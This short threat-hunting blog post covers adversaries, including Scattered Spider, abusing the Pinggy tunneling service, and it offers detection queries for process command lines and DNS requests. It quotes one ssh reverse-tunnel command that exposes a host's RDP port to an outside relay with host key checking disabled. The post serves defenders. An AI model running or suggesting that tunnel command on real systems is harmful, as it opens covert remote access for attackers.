186. Pinggy: Another Tunneling Solution Abused by Adversaries
Hello everyone!
Have you read recent CrowdStrike's report on SCATTERED SPIDER activity? If not, make sure you have! It contains lots of valuable information on adversary's tactics, techniques and procedures.
One of them - abusing Pinggy - another privacy-focused tunneling solution. It's interesting that threat actors don't even have to drop its binary to the compromised system, they can use just ssh, for example:
ssh -p 443 -R0:127.0.0.1:3389 -o StrictHostKeyChecking=no -o ServerAliveInterval=30 4FohZ817ZPe+tcp@a.pinggy.io
So, the first thing to hunt for is "pinggy" in the command line:
event_type: "processcreatewin"
AND
cmdline: "pinggy"
Another opportunity is hunting for Pinggy-related domains:
event_type: "dnsreq"
AND
dns_rname: ("pinggy.io" OR "pinggy.link")
See you tomorrow!
Comments
Post a Comment